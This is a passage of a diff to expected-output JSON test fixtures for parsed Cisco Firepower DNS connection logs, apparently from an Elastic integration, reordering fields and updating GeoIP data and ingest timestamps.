"city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -793,15 +757,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -840,7 +804,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912981900Z", + "ingested": "2021-12-14T14:39:57.642430417Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", 
@@ -903,37 +867,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -942,15 +900,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -989,7 +947,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912987700Z", + "ingested": "2021-12-14T14:39:57.642430818Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1055,37 +1013,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -1094,15 +1046,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1141,7 +1093,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912994100Z", + "ingested": "2021-12-14T14:39:57.642431210Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", 
@@ -1204,37 +1156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "SERVFAIL" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "SERVFAIL" }, "source": { "address": "10.0.1.20", @@ -1243,15 +1189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1290,7 +1236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912999300Z", + "ingested": "2021-12-14T14:39:57.642431619Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -1354,37 +1300,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -1393,15 +1333,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1440,7 +1380,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913005400Z", + "ingested": "2021-12-14T14:39:57.642432006Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", 
@@ -1505,37 +1445,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "refusedthis.com", - "type": "A" - }, - "response_code": "REFUSED" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "refusedthis.com", + "type": "A" + }, + "response_code": "REFUSED" }, "source": { "address": "10.0.1.20", @@ -1544,15 +1478,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1591,7 +1525,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913011300Z", + "ingested": "2021-12-14T14:39:57.642432432Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", @@ -1654,33 +1588,27 @@ "log": { "level": "alert" }, + "dns": { + "response_code": "SERVFAIL" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "81.2.69.144", - "packets": 4 - }, - "dns": { - "response_code": "SERVFAIL" + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -1689,15 +1617,15 @@ "packets": 6, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "tcp", "application": "dns client", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1736,7 +1664,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913017500Z", + "ingested": "2021-12-14T14:39:57.642433022Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1797,37 +1725,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "laskdfjlaksdf.elastic.co", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "laskdfjlaksdf.elastic.co", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -1836,15 +1758,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1883,7 +1805,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913025600Z", + "ingested": "2021-12-14T14:39:57.642433418Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", 
@@ -1947,37 +1869,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "ns-1168.awsdns-18.org", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "ns-1168.awsdns-18.org", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1986,15 +1902,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2033,7 +1949,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913029600Z", + "ingested": "2021-12-14T14:39:57.642433804Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2096,37 +2012,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "_http._tcp.security.ubuntu.com", - "type": "SRV" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "_http._tcp.security.ubuntu.com", + "type": "SRV" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -2135,15 +2045,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2182,7 +2092,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913034500Z", + "ingested": "2021-12-14T14:39:57.642434185Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", 
@@ -2246,37 +2156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2285,15 +2189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2332,7 +2236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913040500Z", + "ingested": "2021-12-14T14:39:57.642434568Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2397,37 +2301,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -2436,15 +2334,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2483,7 +2381,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913045Z", + "ingested": "2021-12-14T14:39:57.642435067Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", 
@@ -2546,37 +2444,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2585,15 +2477,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2632,7 +2524,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913049600Z", + "ingested": "2021-12-14T14:39:57.642445031Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2695,37 +2587,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -2734,15 +2620,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2781,7 +2667,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913053300Z", + "ingested": "2021-12-14T14:39:57.642445517Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", 
@@ -2844,36 +2730,30 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "type": "PTR" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "type": "PTR" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2882,15 +2762,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
